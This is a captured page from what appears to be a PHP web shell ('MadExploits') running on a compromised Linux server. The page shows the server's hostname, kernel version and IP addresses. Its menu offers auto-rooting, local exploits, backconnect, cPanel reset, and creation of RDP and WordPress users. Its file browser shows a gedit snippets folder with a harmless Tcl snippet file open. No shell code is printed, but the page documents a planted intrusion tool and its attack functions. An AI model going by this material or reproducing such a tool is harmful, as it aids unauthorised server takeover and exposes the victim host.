Linux server.flyproject.com.br 3.10.0-1160.el7.x86_64 #1 SMP Mon Oct 19 16:18:59 UTC 2020 x86_64
Apache
: 207.244.227.86 | : 216.73.217.1
10 Domain
7.1.33
hubnog
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
share /
gedit /
plugins /
snippets /
[ HOME SHELL ]
Name
Size
Permission
Action
lang
[ DIR ]
drwxr-xr-x
ui
[ DIR ]
drwxr-xr-x
c.xml
7.19
KB
-rw-r--r--
chdr.xml
6.8
KB
-rw-r--r--
cpp.xml
4.93
KB
-rw-r--r--
css.xml
17.52
KB
-rw-r--r--
docbook.xml
73.45
KB
-rw-r--r--
fortran.xml
4.09
KB
-rw-r--r--
global.xml
51
B
-rw-r--r--
haskell.xml
367
B
-rw-r--r--
html.xml
7.68
KB
-rw-r--r--
idl.xml
992
B
-rw-r--r--
java.xml
1.9
KB
-rw-r--r--
javascript.xml
255
B
-rw-r--r--
latex.xml
1.1
KB
-rw-r--r--
mallard.xml
7.94
KB
-rw-r--r--
markdown.xml
2.29
KB
-rw-r--r--
perl.xml
2.88
KB
-rw-r--r--
php.xml
4.79
KB
-rw-r--r--
python.xml
2.79
KB
-rw-r--r--
rpmspec.xml
625
B
-rw-r--r--
ruby.xml
4.33
KB
-rw-r--r--
sh.xml
1.01
KB
-rw-r--r--
snippets.xml
3.51
KB
-rw-r--r--
tcl.xml
1.08
KB
-rw-r--r--
xml.xml
690
B
-rw-r--r--
xslt.xml
3.5
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : tcl.xml
<?xml version="1.0" encoding="UTF-8"?> <snippets language="Tcl"> <snippet id="foreach"> <text><![CDATA[foreach ${1:var} ${2:$list} { ${3} } ]]></text> <description>foreach...</description> <tag>foreach</tag> </snippet> <snippet id="for"> <text><![CDATA[for {${1:set i 0}} {${2:$i < $n}} {${3:incr i}} { ${4} } ]]></text> <description>for...</description> <tag>for</tag> </snippet> <snippet id="if"> <text><![CDATA[if {${1:condition}} { ${2} } ]]></text> <description>if...</description> <tag>if</tag> </snippet> <snippet id="proc"> <text><![CDATA[proc ${1:name} {${2:args}} \ { ${3} } ]]></text> <description>proc...</description> <tag>proc</tag> </snippet> <snippet id="switch"> <text><![CDATA[switch ${1:-exact} -- ${2:$var} { ${3:match} { ${4} } default {${5}} } ]]></text> <description>switch...</description> <tag>switch</tag> </snippet> <snippet id="while"> <text><![CDATA[while {${1:condition}} { ${2} } ]]></text> <description>while...</description> <tag>while</tag> </snippet> </snippets>
Close